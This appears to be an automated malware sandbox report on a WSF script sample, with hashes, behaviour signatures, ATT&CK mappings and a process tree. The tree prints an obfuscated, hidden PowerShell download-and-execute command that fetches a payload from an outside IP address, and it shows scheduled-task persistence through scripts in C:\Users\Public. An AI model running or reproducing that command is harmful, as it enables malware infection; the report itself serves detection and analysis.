c402685dc7d5b1fa37cc296c0da547bfe874d3d00600831f0689a4f785ee57a5

General

Target

NEAS.NEASc402685dc7d5b1fa37cc296c0da547bfe874d3d00600831f0689a4f785ee57a5unknownunknown_JC.wsf
Size

69KB
MD5

1af10be1ac0841b6f844154543d851d5
SHA1

ed015b49e928c42e7f3c21743e5dd74f310f633d
SHA256

c402685dc7d5b1fa37cc296c0da547bfe874d3d00600831f0689a4f785ee57a5
SHA512

28807eaeeebcd480d7a1294f0644acfbae7e45c088c6d24d72fb7e025ecfc4eac9bd5dc775de8cec2c11335b54b744acc6e36420f136cd4df181d2161bf4c5ab
SSDEEP

768:zjjjjjjjjjjjjjjjjjjjjjjjsjjjjjjjjjjjRE7Lk+AjjjjjjjjjjjSjjjjjjjjf:nnk+V

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1816	WScript.exe
6	1724	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1724	powershell.exe
1880	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 1724	1816	WScript.exe	28
PID 1816 wrote to memory of 1724	1816	WScript.exe	28
PID 1816 wrote to memory of 1724	1816	WScript.exe	28
PID 2928 wrote to memory of 2248	2928	taskeng.exe	34
PID 2928 wrote to memory of 2248	2928	taskeng.exe	34
PID 2928 wrote to memory of 2248	2928	taskeng.exe	34
PID 2248 wrote to memory of 2252	2248	WScript.exe	35
PID 2248 wrote to memory of 2252	2248	WScript.exe	35
PID 2248 wrote to memory of 2252	2248	WScript.exe	35
PID 2252 wrote to memory of 1880	2252	cmd.exe	37
PID 2252 wrote to memory of 1880	2252	cmd.exe	37
PID 2252 wrote to memory of 1880	2252	cmd.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NEAS.NEASc402685dc7d5b1fa37cc296c0da547bfe874d3d00600831f0689a4f785ee57a5unknownunknown_JC.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724

C:\Windows\system32\taskeng.exe
taskeng.exe {D8899728-DEEB-4108-BEAB-C2C02CC2038F} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Public\libraries.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Users\Public\libraries.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\libraries.ps1'"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
db48ab2650884a6c6c748c1f305b4ab6

SHA1
7ebf37449b9b22c264a7cba9ec23b0edd66f7965

SHA256
a79c61ed6d6c080f9a2210fe8c986f0d5a1ef2f1d553902234b016d7af78eac3

SHA512
5d91179fd7008ac300a1484af9be08182ecf3e3e3b15ea09816b61492e4a9c34a5b756cd9b9ac123facd2fdf49bcef44e0b91cc380464d6382099962f815edf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8C2SH5LGEZSYZPK5RK9B.temp

Filesize
7KB

MD5
4db8e0a0a2348c6d81ed7dc43b1ff3b7

SHA1
2ebb6a4d0ddc4facfdcaa1abaa2fe13d228f24d2

SHA256
f7addaa4100a54f7f83aaedfb30d9e9f7f3324d008e971bdd042d033effd8dec

SHA512
343c6118dffc50a5a4d4fb6ea1ecfbf1088107c69a24cc77ddf8c0a5085a89d6b9258bb92609992a8ffdc30d2ed63c04c69063d4e053847945e60a38ab2bf58b

Download Submit
C:\Users\Public\libraries.bat

Filesize
210B

MD5
440e905a6fcf6bcc0ffe763896e21044

SHA1
89bf89ca871095dd7431147a4e0c993bfdba897e

SHA256
aae3e34c1f6bf5eaf7c91afec528d24ac1b10272705be506653b29df17d6e834

SHA512
f324dbff528e9579f81af84c09ab45ef87cd8e516cb22a5f99e432d4d1ca528f3e5d8f7a1f479076a89c18cd44bbaa10df4f6a1fcdc3fe8937febadb892d89fd

Download Submit
C:\Users\Public\libraries.vbs

Filesize
691B

MD5
882c260115cfacc236251d065cc23c4c

SHA1
cee58dd936e493370224db57ca49c4d6c0cbfeff

SHA256
1d1595fdd363891dd2d9d081059b2dcbca1edc72c80b6c637436a9090ba2564a

SHA512
d1279bcc0150ba96164445a98fdb5ff5ef6cde81460af71612ee0f0a7ac8155f9d3a73aa26ccb53a9da6493e078aef42e20ca26011f0f5aa855f5ced61236641

Download Submit
memory/1724-12-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/1724-7-0x000000001B400000-0x000000001B6E2000-memory.dmp

Filesize
2.9MB

Download
memory/1724-13-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/1724-16-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/1724-11-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/1724-10-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/1724-9-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/1724-8-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1880-26-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1880-24-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download
memory/1880-25-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1880-27-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download
memory/1880-28-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download
memory/1880-30-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1880-29-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/1880-31-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1880-32-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing